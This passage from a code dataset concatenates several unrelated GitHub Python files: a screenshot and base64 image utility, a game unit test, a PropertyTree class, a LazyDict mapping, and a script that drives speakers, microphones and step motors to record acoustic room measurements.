pyautogui.position()\n return x, y\n\n\ndef getBoxByKey():\n \"\"\"\n 开内需两次按下 positionKey , 获取所选区域的 box\n :return: Box(left, top, width, height)\n \"\"\"\n x1, y1 = getPositionByKey()\n x2, y2 = getPositionByKey()\n left = x1 if x1 < x2 else x2\n top = y1 if y1 < y2 else y2\n width = abs(x1 - x2)\n height = abs(y1 - y2)\n return left, top, width, height\n\n\ndef nowTime():\n \"\"\"\n 返回当前时间的 %Y-%m-%d_%H-%M-%S 格式\n :return:\n \"\"\"\n return datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")\n\n\ndef screenShotByKey():\n \"\"\"\n 按下两次快捷键后截图, 保存名称为 %Y-%m-%d_%H-%M-%S.png\n :return: 文件保存地址\n \"\"\"\n imgName = nowTime() + '.png'\n path = os.path.abspath(imagesPath + r'/' + imgName)\n if not os.path.exists(imagesPath):\n # 如果src目录不存在则创建\n os.mkdir(imagesPath)\n pyautogui.screenshot(path, region=getBoxByKey())\n return path\n\n\ndef getAllFiles(rootPath: str, expression: str) -> list:\n \"\"\"\n 获取根目录下的所有文件列表\n :param rootPath: 根目录\n :param expression: 文件名正则表达式\n :return: 根目录下的所有文件列表\n \"\"\"\n if not os.path.exists(rootPath):\n return []\n allFiles = []\n cp = re.compile(expression)\n for filename in os.listdir(rootPath):\n path = os.path.join(rootPath, filename)\n if os.path.isdir(path):\n allFiles += getAllFiles(path, expression)\n elif cp.search(path):\n allFiles.append(os.path.abspath(path))\n return allFiles\n\n\ndef imgToStr(img: Image.Image):\n \"\"\"\n 图片转为字符串\n :param img: 原图片\n :return: 图片转为的字符串\n \"\"\"\n imgByte = BytesIO()\n img.save(imgByte, format='PNG')\n byteContent = imgByte.getvalue()\n base64_bytes = b64encode(byteContent)\n return base64_bytes.decode('utf-8')\n\n\ndef strToImg(byteStr: str) -> Image.Image:\n \"\"\"\n 字符串转图片\n :param byteStr: 字符串\n :return: 字符串转为的图片\n \"\"\"\n imgByte = b64decode(byteStr)\n return Image.open(BytesIO(imgByte))\n","repo_name":"LongXingLuoLuo/free_keyboard_control","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"28173352238","text":"import unittest\nfrom src.game import Game\n\n\nclass TestGame(unittest.TestCase):\n def setUp(self) -> None:\n print(\"set up\")\n\n def tearDown(self) -> None:\n print(\"tear down\")\n\n def test_game(self):\n game = Game()\n game.human_move(1, 1)\n self.assertEqual(game.board.get_symbol_from_board(1, 1), 'X')\n self.assertEqual(game.is_won(), False)\n game.human_move(1, 4)\n game.human_move(4, 1)\n game.human_move(4, 4)\n self.assertEqual(game.is_won(), True)\n","repo_name":"andreealaslo/UBB-CS","sub_path":"Semester 1/FP/Obstruction/src/tests/test_game.py","file_name":"test_game.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"11591121640","text":"class PropertyTree(object):\n \"\"\"\n Dynamic PropretyTree class.\n\n Enables dynamic definition of tree-like python objects.\n \"\"\"\n def __init__(self,ptype =\"tree\",init = None):\n self._type = ptype\n self._locked = False\n if self._type == \"tree\":\n self._value = {}\n if not init is None:\n self.update(init)\n else:\n self._value = init\n def update(self,pval):\n \"\"\"\n Add entires from passed object.\n\n Accepts both PropertyTree and dict instances.\n \"\"\"\n if isinstance(pval,dict):\n for path,value in list(pval.items()):\n self.add_property(path,value)\n else:\n for path,value in list(pval.properties().items()):\n self.add_property(path,value)\n def clear(self):\n \"\"\"\n Clears all entries.\n \"\"\"\n self._locked = False\n if self._type == \"tree\":\n self._value = {}\n else:\n self._value = None\n def properties(self):\n \"\"\"\n Returns a dict that maps all PropertyTree paths to their objects.\n \"\"\"\n res = {}\n if self._type == \"tree\":\n keys = list(self._value.keys())\n for k in keys:\n curr = self._value[k]\n if curr._type==\"tree\":\n for p,v in list(curr.properties().items()):\n res[k + \"/\" + p] = v\n else:\n res[k] = curr._value\n return res\n def children(self):\n \"\"\"\n Returns a dict that maps the paths of all children of the curent\n node to their objects.\n \"\"\"\n res = {}\n if self._type == \"tree\":\n keys = list(self._value.keys())\n keys.sort()\n for k in keys:\n curr = self._value[k]\n res[k] = curr\n return res\n def add_property(self,path,value=None):\n \"\"\"\n Adds an object to the given path.\n \"\"\"\n idx = path.find(\"/\")\n if idx > 0:\n lpath = path[:idx]\n rpath = path[idx+1:]\n if not lpath in list(self._value.keys()):\n tree = PropertyTree()\n self._value[lpath] = tree\n else:\n tree = self._value[lpath]\n tree.add_property(rpath,value)\n else:\n if value is None:\n self._value[path] = PropertyTree()\n else:\n self._value[path] = PropertyTree(\"node\",value)\n def has_property(self,path):\n \"\"\"\n Returns true if an object exists at the given path.\n \"\"\"\n node = self.fetch_property(path)\n return not node is None\n def remove_property(self,path):\n \"\"\"\n Removes the object at the given path.\n \"\"\"\n # find the proper node in the tree and remove it\n idx = path.find(\"/\")\n if idx > 0:\n lpath = path[:idx]\n rpath = path[idx+1:]\n tree = self._value[lpath]\n tree.remove_property(rpath)\n elif path in list(self._value.keys()):\n del self._value[path]\n def lock(self):\n \"\"\"\n Locks the PropertyTree.\n\n Prevents creation (explcit and dynamic) of new paths.\n \"\"\"\n self._locked = True\n if self._type == \"tree\":\n for v in list(self._value.values()):\n v.lock()\n def unlock(self):\n \"\"\"\n Unlocks the PropertyTree.\n\n Allows creation (explcit and dynamic) of new paths.\n \"\"\"\n self._locked = False\n if self._type == \"tree\":\n for v in list(self._value.values()):\n v.unlock()\n def __getitem__(self,path):\n \"\"\"\n Used to provide access to paths via the [] operator.\n \"\"\"\n node = self.fetch_property(path)\n if node is None:\n if self._locked:\n raise AttributeError(path)\n self.add_property(path)\n node = self.fetch_property(path)\n if node._type == \"tree\":\n return node\n else:\n return node._value\n def __setitem__(self,path,obj):\n \"\"\"\n Used to create paths via the [] operator.\n \"\"\"\n node = self.fetch_property(path)\n if node is None:\n if self._locked:\n raise AttributeError(path)\n self.add_property(path,obj)\n else:\n node._type = \"node\"\n node._value = obj\n def fetch_property(self,path):\n \"\"\"\n Fetches the object at a given path.\n\n Returns None if the path does not exist.\n \"\"\"\n idx = path.find(\"/\")\n if idx > 0:\n lpath = path[:idx]\n if lpath in list(self._value.keys()):\n rpath = path[idx+1:]\n tree = self._value[lpath]\n return tree.fetch_property(rpath)\n return None\n elif path in list(self._value.keys()):\n return self._value[path]\n else:\n return None\n def __str__(self):\n \"\"\"\n String pretty print.\n \"\"\"\n return self.__gen_string(\"\")\n def __gen_string(self,path):\n \"\"\"\n Helper for creating a pretty print string.\n \"\"\"\n res = \"\"\n if self._type == \"tree\":\n for k in list(self._value.keys()):\n npath = path + k + \"/\"\n res += self._value[k].__gen_string(npath)\n else:\n res = path + \"%s:%s\\n\" % (self._type,str(self._value))\n return res\n def __getattr__(self, name):\n \"\"\"\n Used to provide access to paths via the dot operator.\n\n Calls __getitem__\n \"\"\"\n if name.startswith(\"__\") and name.endswith(\"__\"):\n raise AttributeError(name)\n try:\n return self.__getitem__(name)\n except KeyError:\n raise AttributeError(name)\n def __setattr__(self, name,obj):\n \"\"\"\n Used to create paths via the dot operator.\n\n Calls __setitem__\n \"\"\"\n if name == \"_value\" or name == \"_type\" or name == \"_locked\":\n self.__dict__[name] = obj\n else:\n self.__setitem__(name, obj)\n\n\n\n","repo_name":"visit-dav/visit","sub_path":"src/visitpy/visit_flow/flow/src/core/property_tree.py","file_name":"property_tree.py","file_ext":"py","file_size_in_byte":6277,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"23"} +{"seq_id":"8893207667","text":"import collections\nimport itertools\n\nclass LazyDict(collections.MutableMapping):\n def __init__(self, source, keyfunc, dict=None):\n self._source = iter(source)\n if not callable(keyfunc): raise TypeError(\"unhashable type\")\n self._keyfunc = keyfunc\n self._dict = dict if dict else {}\n\n def __len__(self):\n if self._source:\n raise AttributeError(\"length undetermined\")\n else:\n return len(self._dict)\n\n def __iter__(self):\n def tail():\n while True: yield self._next_key()\n return itertools.chain(self._dict, tail())\n\n def _next_key(self):\n item = next(self._source)\n key = self._keyfunc(item)\n\n if key in self._dict:\n raise LookupError(': '.join([\"non-unique key\", key]))\n self._dict[key] = item\n\n return key\n\n def __getitem__(self, key):\n if isinstance(key, slice):\n raise NotImplementedError(': '.join([\"unsliceable\",\n self.__class__.__name__]))\n if key in self._dict: return self._dict[key]\n if not self._source: raise KeyError(key)\n\n while True:\n try:\n if self._next_key() == key: return self._dict[key]\n except StopIteration:\n self._source = None\n raise KeyError(key)\n\n def __setitem__(self, key, value):\n self._dict[key] = value\n\n def __delitem__(self, key):\n self.__getitem__(key)\n del(self._dict[key])\n","repo_name":"beadsland/fixTracks","sub_path":"savvy/common/lazydict.py","file_name":"lazydict.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"12848637461","text":"#!/usr/bin/env python3\nfrom header import *\nfrom microphone_numbers import * \nfrom speaker_numbers import * \nfrom Record import *\nfrom ess import *\nfrom transmitter import *\nfrom receiver import *\nfrom sensor import *\nfrom webcam import *\nfrom motor import *\nfrom save import *\n\nSTART_HOUR=0\n\ninitialMicrophoneStandCoordinates=[]\ninitialSpeakerStandCoordinates=[]\n\n\ndef loadSpeakerAndMicrophonePositionsRelativeToTheirOwnStand():\n\n ## KEY'LER KUCUK HARF OLMALIDIR !!!!\n config = configparser.ConfigParser()\n \n\n if os.path.exists(DATA_DIR+\"/single-speaker/setup-properties/record.ini\") :\n setupState=input(\"Is there any change in Microphone and Speaker relative positions to their own stands ? (y/n)\")\n if setupState == \"y\" :\n os.replace(DATA_DIR+\"/single-speaker/setup-properties/record.ini\",DATA_DIR+\"/single-speaker/setup-properties/record.ini.org\")\n print(\"copied old config to : \"+ DATA_DIR+\"/single-speaker/setup-properties/record.ini.org\")\n os.remove(DATA_DIR+\"/single-speaker/setup-properties/record.ini\") \n \n if not os.path.exists(DATA_DIR+\"/single-speaker/setup-properties/record.ini\"):\n\n if not os.path.exists(DATA_DIR+\"/single-speaker/setup-properties\"):\n os.makedirs(DATA_DIR+\"/single-speaker/setup-properties\")\n \n\n config['speaker.positions']={}\n for speakerNo in range(NUMBER_OF_SPEAKERS):\n while True:\n r = input(f\"speaker_{speakerNo}_R (Centimeters) :\")\n try:\n r = float(r)\n break\n except ValueError:\n print ('Numbers only')\n config['speaker.positions'][f'speaker_{speakerNo}_r']=str(r)\n while True:\n z = input(f\"speaker_{speakerNo}_Z (Centimeters) :\")\n try:\n z = float(z)\n break\n except ValueError:\n print ('Numbers only')\n config['speaker.positions'][f'speaker_{speakerNo}_z']=str(z)\n\n config['mic.positions']={}\n for micNo in range(NUMBER_OF_MICROPHONES):\n while True:\n r = input(f\"mic_{micNo}_R (Centimeters) :\")\n try:\n r = float(r)\n break\n except ValueError:\n print ('Numbers only')\n config['mic.positions'][f'mic_{micNo}_r']=str(r)\n while True:\n z = input(f\"mic_{micNo}_Z (Centimeters) :\")\n try:\n z = float(z)\n break\n except ValueError:\n print ('Numbers only')\n config['mic.positions'][f'mic_{micNo}_z']=str(z)\n\n with open(DATA_DIR+\"/single-speaker/setup-properties/record.ini\", 'w') as configfile:\n config.write(configfile)\n\n #### LOAD FROM FILE\n\n config.read(DATA_DIR+\"/single-speaker/setup-properties/record.ini\")\n\n \n for speakerNo in range(NUMBER_OF_SPEAKERS):\n R_SPEAKER.append(float(config['speaker.positions'][f'speaker_{speakerNo}_r']))\n Z_SPEAKER.append(float(config['speaker.positions'][f'speaker_{speakerNo}_z']))\n \n for micNo in range(NUMBER_OF_MICROPHONES):\n R_MIC.append(float(config['mic.positions'][f'mic_{micNo}_r']))\n Z_MIC.append(float(config['mic.positions'][f'mic_{micNo}_z']))\n\n\n\n\ndef loadRoomDimensions(room_number):\n\n global ROOM_DIM_WIDTH,ROOM_DIM_DEPTH,ROOM_DIM_HEIGHT\n\n ## KEY'LER KUCUK HARF OLMALIDIR !!!!\n config = configparser.ConfigParser()\n\n \n if not os.path.exists(DATA_DIR+\"/single-speaker/room-\"+str(room_number)+\"/properties\"):\n os.makedirs(DATA_DIR+\"/single-speaker/room-\"+str(room_number)+\"/properties\")\n\n config['room.dimensions']={}\n while True:\n room_width = input(f\"room_width (Measured parallel to door face) (Centimeters) :\")\n try:\n room_width = float(room_width)\n break\n except ValueError:\n print ('Numbers only')\n config['room.dimensions'][f'room_width']=str(room_width)\n \n while True:\n room_depth = input(f\"room_depth (Measured perpendicular to door face) (Centimeters) :\")\n try:\n room_depth = float(room_depth)\n break\n except ValueError:\n print ('Numbers only')\n config['room.dimensions'][f'room_depth']=str(room_depth)\n \n while True:\n room_height = input(f\"room_height (Height of the room) (Centimeters) :\")\n try:\n room_height = float(room_height)\n break\n except ValueError:\n print ('Numbers only')\n config['room.dimensions'][f'room_height']=str(room_height)\n \n\n with open(DATA_DIR+\"/single-speaker/room-\"+str(room_number)+\"/properties/record.ini\", 'w') as configfile:\n config.write(configfile)\n\n #### LOAD FROM FILE\n\n config.read(DATA_DIR+\"/single-speaker/room-\"+str(room_number)+\"/properties/record.ini\")\n ROOM_DIM_WIDTH=float(config['room.dimensions']['room_width'])\n ROOM_DIM_DEPTH=float(config['room.dimensions']['room_depth'])\n ROOM_DIM_HEIGHT=float(config['room.dimensions']['room_height'])\n\ndef euclidean_distance(x1,y1,x2,y2):\n x_sqr=pow((x1-x2),2)\n y_sqr=pow((y1-y2),2)\n return math.sqrt(x_sqr+y_sqr)\n\ndef getStandPositions():\n logger.info(\"0,0 y --> + \")\n logger.info(\" #############################################################\")\n logger.info(\" #############################################################\")\n logger.info(\" #############################################################\")\n logger.info(\"X ###########################################################\")\n logger.info(\"| ###########################################################\")\n logger.info(\"+ ###########################################################\")\n logger.info(\" #############################################################\")\n logger.info(\" #############################################################\")\n logger.info(\" #############################################################\")\n logger.info(\" #############################################################\")\n logger.info(\" #############################################################\")\n logger.info(\" #################### DOOR ###########################\")\n\n initialMicrophoneStandCoordinatesX=-100000\n initialMicrophoneStandCoordinatesXInput=\"\"\n R_OF_THE_MICROPHONE_CARRIER=150\n while initialMicrophoneStandCoordinatesX+ R_OF_THE_MICROPHONE_CARRIER > ROOM_DIM_DEPTH or initialMicrophoneStandCoordinatesX - R_OF_THE_MICROPHONE_CARRIER < 0 :\n while True:\n initialMicrophoneStandCoordinatesXInput=input(\"Initial Microphone Stand Cooridinates X Centimeters :\")\n try :\n initialMicrophoneStandCoordinatesX=float(initialMicrophoneStandCoordinatesXInput)\n if initialMicrophoneStandCoordinatesX + R_OF_THE_MICROPHONE_CARRIER > ROOM_DIM_DEPTH :\n logger.info (f'initialMicrophoneStandCoordinatesX + R_OF_THE_MICROPHONE_CARRIER ({initialMicrophoneStandCoordinatesX + R_OF_THE_MICROPHONE_CARRIER}) > ROOM_DIM_DEPTH ({ROOM_DIM_DEPTH}) , Please RE-MEASURE the microphone stand\\'s X position')\n elif initialMicrophoneStandCoordinatesX - R_OF_THE_MICROPHONE_CARRIER < 0 :\n logger.info (f'initialMicrophoneStandCoordinatesX - R_OF_THE_MICROPHONE_CARRIER ({initialMicrophoneStandCoordinatesX - R_OF_THE_MICROPHONE_CARRIER}) < 0 , Please RE-MEASURE the microphone stand\\'s X position')\n else:\n break\n except ValueError:\n print ('Numbers only')\n logger.info ('initialMicrophoneStandCoordinatesX is : '+str(initialMicrophoneStandCoordinatesX))\n initialMicrophoneStandCoordinates.append(initialMicrophoneStandCoordinatesX)\n \n initialMicrophoneStandCoordinatesY=-100000\n initialMicrophoneStandCoordinatesYInput=\"\"\n while initialMicrophoneStandCoordinatesY+ R_OF_THE_MICROPHONE_CARRIER > ROOM_DIM_WIDTH or initialMicrophoneStandCoordinatesY - R_OF_THE_MICROPHONE_CARRIER < 0 :\n while True:\n initialMicrophoneStandCoordinatesYInput=input(\"Initial Microphone Stand Cooridinates Y Centimeters :\")\n try :\n initialMicrophoneStandCoordinatesY=float(initialMicrophoneStandCoordinatesYInput)\n if initialMicrophoneStandCoordinatesY + R_OF_THE_MICROPHONE_CARRIER > ROOM_DIM_WIDTH :\n logger.info (f'initialMicrophoneStandCoordinatesY + R_OF_THE_MICROPHONE_CARRIER ({initialMicrophoneStandCoordinatesY + R_OF_THE_MICROPHONE_CARRIER}) > ROOM_DIM_WIDTH ({ROOM_DIM_WIDTH}) , Please RE-MEASURE the microphone stand\\'s Y position')\n elif initialMicrophoneStandCoordinatesY - R_OF_THE_MICROPHONE_CARRIER < 0 :\n logger.info (f'initialMicrophoneStandCoordinatesY - R_OF_THE_MICROPHONE_CARRIER ({initialMicrophoneStandCoordinatesY - R_OF_THE_MICROPHONE_CARRIER}) < 0 , Please RE-MEASURE the microphone stand\\'s Y position')\n else:\n break\n except ValueError:\n print ('Numbers only')\n logger.info ('initialMicrophoneStandCoordinatesY is : '+str(initialMicrophoneStandCoordinatesY))\n initialMicrophoneStandCoordinates.append(initialMicrophoneStandCoordinatesY)\n\n initialMicrophoneStandCoordinatesZ=0\n initialMicrophoneStandCoordinates.append(initialMicrophoneStandCoordinatesZ)\n\n logger.info ('initialMicrophoneStandCoordinates[0] is : '+str(initialMicrophoneStandCoordinates[0]))\n logger.info ('initialMicrophoneStandCoordinates[1] is : '+str(initialMicrophoneStandCoordinates[1]))\n logger.info ('initialMicrophoneStandCoordinates[2] is : '+str(initialMicrophoneStandCoordinates[2]))\n \n \n \n \n \n\n initialSpeakerStandCoordinatesX=-100000\n initialSpeakerStandCoordinatesXInput=\"\"\n R_OF_THE_SPEAKER_CARRIER=100\n R_BETWEEN_MICROPHONE_AND_SPAKER_STANDS=-10000\n while R_BETWEEN_MICROPHONE_AND_SPAKER_STANDS < R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER :\n while initialSpeakerStandCoordinatesX+ R_OF_THE_SPEAKER_CARRIER > ROOM_DIM_DEPTH or initialSpeakerStandCoordinatesX - R_OF_THE_SPEAKER_CARRIER < 0 :\n while True:\n initialSpeakerStandCoordinatesXInput=input(\"Initial Speaker Stand Cooridinates X Centimeters :\")\n try :\n initialSpeakerStandCoordinatesX=float(initialSpeakerStandCoordinatesXInput)\n if initialSpeakerStandCoordinatesX + R_OF_THE_SPEAKER_CARRIER > ROOM_DIM_DEPTH :\n logger.info (f'initialSpeakerStandCoordinatesX + R_OF_THE_SPEAKER_CARRIER ({initialSpeakerStandCoordinatesX + R_OF_THE_SPEAKER_CARRIER}) > ROOM_DIM_DEPTH ({ROOM_DIM_DEPTH}) , Please RE-MEASURE the speaker stand\\'s X position')\n elif initialSpeakerStandCoordinatesX - R_OF_THE_SPEAKER_CARRIER < 0 :\n logger.info (f'initialSpeakerStandCoordinatesX - R_OF_THE_SPEAKER_CARRIER ({initialSpeakerStandCoordinatesX - R_OF_THE_SPEAKER_CARRIER}) < 0 , Please RE-MEASURE the speaker stand\\'s X position')\n #elif abs(initialSpeakerStandCoordinatesX-initialMicrophoneStandCoordinatesX) < R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER :\n # logger.info (f'abs(initialSpeakerStandCoordinatesX-initialMicrophoneStandCoordinatesX) ({abs(initialSpeakerStandCoordinatesX-initialMicrophoneStandCoordinatesX)}) < R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER ({R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER}) , Please RE-MEASURE the speaker stand\\'s X position')\n else :\n break\n except ValueError:\n print ('Numbers only')\n \n initialSpeakerStandCoordinatesY=-100000\n initialSpeakerStandCoordinatesYInput=\"\"\n\n while initialSpeakerStandCoordinatesY+ R_OF_THE_SPEAKER_CARRIER > ROOM_DIM_WIDTH or initialSpeakerStandCoordinatesY - R_OF_THE_SPEAKER_CARRIER < 0 :\n while True:\n initialSpeakerStandCoordinatesYInput=input(\"Initial Speaker Stand Cooridinates Y Centimeters :\")\n try :\n initialSpeakerStandCoordinatesY=float(initialSpeakerStandCoordinatesYInput)\n if initialSpeakerStandCoordinatesY + R_OF_THE_SPEAKER_CARRIER > ROOM_DIM_WIDTH :\n logger.info (f'initialSpeakerStandCoordinatesY + R_OF_THE_SPEAKER_CARRIER ({initialSpeakerStandCoordinatesY + R_OF_THE_SPEAKER_CARRIER}) > ROOM_DIM_WIDTH ({ROOM_DIM_WIDTH}) , Please RE-MEASURE the speaker stand\\'s Y position')\n if initialSpeakerStandCoordinatesY - R_OF_THE_SPEAKER_CARRIER < 0 :\n logger.info (f'initialSpeakerStandCoordinatesY - R_OF_THE_SPEAKER_CARRIER ({initialSpeakerStandCoordinatesY - R_OF_THE_SPEAKER_CARRIER}) < 0 , Please RE-MEASURE the speaker stand\\'s Y position')\n elif euclidean_distance(initialSpeakerStandCoordinatesX,initialSpeakerStandCoordinatesY,initialMicrophoneStandCoordinatesX,initialMicrophoneStandCoordinatesY) < R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER :\n logger.info (f'euclidean_distance(initialSpeakerStandCoordinatesX,initialSpeakerStandCoordinatesY,initialMicrophoneStandCoordinatesX,initialMicrophoneStandCoordinatesY) < R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER ({R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER}) , Please RE-MEASURE the speaker stand\\'s Y position')\n else:\n break\n except ValueError:\n print ('Numbers only')\n \n \n DX=abs(initialSpeakerStandCoordinatesX-initialMicrophoneStandCoordinatesX)\n DY=abs(initialSpeakerStandCoordinatesY-initialMicrophoneStandCoordinatesY)\n R_BETWEEN_MICROPHONE_AND_SPAKER_STANDS=math.sqrt(DX**2+DY**2)\n if R_BETWEEN_MICROPHONE_AND_SPAKER_STANDS < R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER :\n initialSpeakerStandCoordinatesX=-100000\n initialSpeakerStandCoordinatesY=-100000\n logger.info (f'R_BETWEEN_MICROPHONE_AND_SPAKER_STANDS ({R_BETWEEN_MICROPHONE_AND_SPAKER_STANDS}) < R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER ({R_OF_THE_SPEAKER_CARRIER+R_OF_THE_MICROPHONE_CARRIER}) , Please RE-MEASURE the speaker stand\\'s positions')\n \n \n logger.info ('initialSpeakerStandCoordinatesX is : '+str(initialSpeakerStandCoordinatesX))\n initialSpeakerStandCoordinates.append(initialSpeakerStandCoordinatesX)\n \n logger.info ('initialSpeakerStandCoordinatesY is : '+str(initialSpeakerStandCoordinatesY))\n initialSpeakerStandCoordinates.append(initialSpeakerStandCoordinatesY)\n \n initialSpeakerStandCoordinatesZ=0\n initialSpeakerStandCoordinates.append(initialSpeakerStandCoordinatesZ)\n\n logger.info ('initialSpeakerStandCoordinates[0] is : '+str(initialSpeakerStandCoordinates[0]))\n logger.info ('initialSpeakerStandCoordinates[1] is : '+str(initialSpeakerStandCoordinates[1]))\n logger.info ('initialSpeakerStandCoordinates[2] is : '+str(initialSpeakerStandCoordinates[2]))\n \n\n\ndef main():\n\n if len(sys.argv) > 0 :\n TEST_MODE=sys.argv[1]\n \n ess_signal=generate_ess_signal()\n #transmitSignal(0,ess_signal,\"TEST_MODE_DEVICE_MOC\")\n\n song_signal=get_song_signal()\n #transmitSignal(0,song_signal,\"TEST_MODE_DEVICE_MOC\",format =pyaudio.paFloat32)\n \n leftEssSignal=generate_left_signal(ess_signal)\n rightEssSignal=generate_right_signal(ess_signal)\n #transmitSignal(0,leftEssSignal,\"TEST_MODE_DEVICE_MOC\")\n \n \n leftSongSignal=generate_left_signal(song_signal)\n rightSongSignal=generate_right_signal(song_signal)\n #transmitSignal(0,leftSongSignal,\"TEST_MODE_DEVICE_MOC\",format =pyaudio.paFloat32)\n \n \n \n loadSpeakerAndMicrophonePositionsRelativeToTheirOwnStand()\n\n resetSpeakerStepMotor(TEST_MODE)\n resetMicrophoneStepMotor(TEST_MODE)\n \n \n\n\n\n room_number=input(\"Room Number:\")\n while room_number==\"\":\n room_number=input(\"Room Number:\")\n logger.info ('room number is : '+str(room_number))\n\n loadRoomDimensions(room_number)\n \n getStandPositions()\n\n logger.info ('MAX_NUMBER_OF_MIC_ITERATION is : '+str(MAX_NUMBER_OF_MIC_ITERATION))\n logger.info ('MAX_NUMBER_OF_SPEAKER_ITERATION is : '+str(MAX_NUMBER_OF_SPEAKER_ITERATION))\n \n config_number=\"micx-\"+str(initialMicrophoneStandCoordinates[0])+\"-micy-\"+str(initialMicrophoneStandCoordinates[1])+\"-spkx-\"+str(initialSpeakerStandCoordinates[0])+\"-spky-\"+str(initialSpeakerStandCoordinates[1])+\"-\"+str(RECORD_TIMESTAMP) \n \n logger.info(\"##############################################################\")\n logger.info(\" Room : \"+str(room_number))\n logger.info(\" Config : \"+str(config_number))\n \n \n logger.info(\"##############################################################\")\n\n hour=datetime.datetime.now().hour\n while hour < START_HOUR:\n hour=datetime.datetime.now().hour\n logger.info(f\"{hour} is not yet {START_HOUR}, script will start at approximately {START_HOUR}:00 - {START_HOUR}:10 \")\n time.sleep(600) ## sleep 600 seconds = 10 mins\n\n \n \n for microphoneIterationNo in range(MAX_NUMBER_OF_MIC_ITERATION):\n \n logger.info(\">>Microphone Iteration No : \"+str(microphoneIterationNo))\n if microphoneIterationNo%2 == 0 : \n speakerIterationDirection=1\n else :\n speakerIterationDirection=0\n \n for speakerIterationNo in range(MAX_NUMBER_OF_SPEAKER_ITERATION):\n logger.info(\">>>Speaker Iteration No : \"+str(speakerIterationNo))\n\n for activeSpeakerNo in range(len(SPEAKERS)):\n logger.info(\">>>>Active Speaker No : \"+str(activeSpeakerNo))\n for channelNo in range(2):\n #logger.info(\">>>> Reset USB Ports ...\")\n #process=subprocess.Popen([SCRIPT_DIR+\"/reset_usb_ports_if_test_devices_fail.sh\"],shell=True,stdout=subprocess.PIPE)\n #out,err=process.communicate()\n #print(out)\n #print(err)\n\n logger.info(\">>>>Channel No : \"+str(channelNo))\n\n if channelNo == 0 :\n essSignal=leftEssSignal\n songSignal=leftSongSignal\n else : \n essSignal=rightEssSignal\n songSignal=rightSongSignal\n record=Record()\n record.timestamp=str(datetime.datetime.fromtimestamp(time.time()).strftime('%Y.%m.%d_%H.%M.%S'))\n record.roomNo=room_number\n record.configNo=config_number\n record.speakerMotorIterationNo=speakerIterationNo\n record.microphoneMotorIterationNo=microphoneIterationNo\n record.speakerMotorIterationDirection=speakerIterationDirection\n record.microphoneStandInitialCoordinate=initialMicrophoneStandCoordinates ## [ X , Y , Z ]\n record.speakerStandInitialCoordinate=initialSpeakerStandCoordinates ## [ X , Y , Z ]\n record.currentActiveSpeakerNo=activeSpeakerNo \n record.currentActiveSpeakerChannelNo=channelNo \n record.physicalSpeakerNo=record.getSpeakerNo()\n record.photos=takePhoto(TEST_MODE)\n record.microphoneMotorPosition=getMicrophoneMotorPosition(TEST_MODE)\n record.speakerMotorPosition=getSpeakerMotorPosition(TEST_MODE)\n\n # THESE records will be taken from /tmp/tempHum.txt by save.py\n #tempHum=getMicrophoneTemperatureHumidity()\n #record.temperatureAtMicrohponeStand=tempHum[0]\n #record.humidityAtMicrohponeStand=tempHum[1]\n #tempHum=getSpeakerTemperatureHumidity()\n #record.temperature=tempHum[0]\n #record.humidity=tempHum[1]\n record.transmittedSignal=essSignal\n \n threads=[] \n \n for microphoneNo in range(NUMBER_OF_MICROPHONES):\n t = threading.Thread(target=receiveESSSignal, args = (microphoneNo, record,TEST_MODE))\n threads.append(t)\n \n for microphoneNo in range(NUMBER_OF_MICROPHONES):\n threads[microphoneNo].start()\n \n transmitSignal(activeSpeakerNo,essSignal,TEST_MODE)\n \n for microphoneNo in range(NUMBER_OF_MICROPHONES):\n threads[microphoneNo].join()\n\n\n if TEST_MODE == \"TEST_MODE_NONE\" :\n time.sleep(10) # sleep 10 seconds\n logger.info(\">>>>>> Transmitting and Receiving Song \")\n\n\n\n record.transmittedSongSignal=songSignal\n \n threads=[] \n \n for microphoneNo in range(NUMBER_OF_MICROPHONES):\n t = threading.Thread(target=receiveSongSignal, args = (microphoneNo, record,TEST_MODE))\n threads.append(t)\n \n for microphoneNo in range(NUMBER_OF_MICROPHONES):\n threads[microphoneNo].start()\n \n transmitSignal(activeSpeakerNo,songSignal,TEST_MODE,format =pyaudio.paFloat32)\n \n for microphoneNo in range(NUMBER_OF_MICROPHONES):\n threads[microphoneNo].join()\n\n \n save(record)\n\n if TEST_MODE == \"TEST_MODE_NONE\" :\n time.sleep(10) # sleep 10 seconds\n \n # same level as \"for activeSpeakerNo in range(len(SPEAKERS)):\" above.\n logger.info(\">>>> Speaker Iteration Direction is : \"+str(speakerIterationDirection))\n moveSpeakerStepMotor(speakerIterationDirection,speakerIterationNo,TEST_MODE)\n logger.info(\">>>> Sleep 10 seconds , Wait the step motor noise to fade out...\")\n if TEST_MODE == \"TEST_MODE_NONE\" :\n time.sleep(10) # sleep 10 seconds, wait the step motor noise to fade out.\n \n # same level as \"for microphoneIterationNo in range(maxNumberOfMicrophoneIteration)\" above.\n\n moveMicophoneStepMotor(microphoneIterationNo,TEST_MODE)\n #resetSpeakerStepMotor(TEST_MODE)\n logger.info(\">>>> Sleep 10 seconds , Wait the step motor noise to fade out...\")\n if TEST_MODE == \"TEST_MODE_NONE\" :\n time.sleep(10) # sleep 10 seconds, wait the step motor noise to fade out.\n else :\n time.sleep(1) # sleep 10 seconds, wait the step motor noise to fade out.\n \n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n 